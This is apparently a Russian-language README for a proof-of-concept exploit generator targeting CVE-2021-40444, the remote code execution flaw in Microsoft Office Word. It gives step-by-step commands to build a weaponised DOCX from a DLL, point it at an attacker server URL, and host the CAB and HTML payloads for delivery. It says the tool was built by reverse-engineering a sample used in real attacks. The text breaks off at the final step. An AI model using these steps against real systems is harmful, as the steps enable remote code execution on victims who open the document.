
Создает вредоносные DOCX-файлы, эксплуатирующие CVE-2021-40444 для достижения удаленного выполнения кода через специально созданные CAB и HTML-полезные нагрузки, со встроенным хостинг-сервером для доставки.
Генератор вредоносных docx-файлов для эксплуатации CVE-2021-40444 (Microsoft Office Word удаленное выполнение кода)
Создание этого скрипта основано на реверс-инжиниринге образца, использовавшегося в реальных атаках: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx файл)
Вам нужно сначала установить lcab (sudo apt-get install lcab)
Обратитесь к REPRODUCE.md за инструкциями по ручному воспроизведению
Если сгенерированный cab не работает, попробуйте указать в URL exploit.html путь к calc.cab
Сначала сгенерируйте вредоносный docx-документ, используя DLL. Вы можете использовать DLL из test/calc.dll, которая просто запускает calc.exe с помощью вызова system()
python3 exploit.py generate test/calc.dll http://<SRV IP>

После генерации вредоносного docx (он будет в out/) можно настроить сервер:
sudo python3 exploit.py host 80

Наконец, попробуйте открыть docx в виртуальной машине Windows:
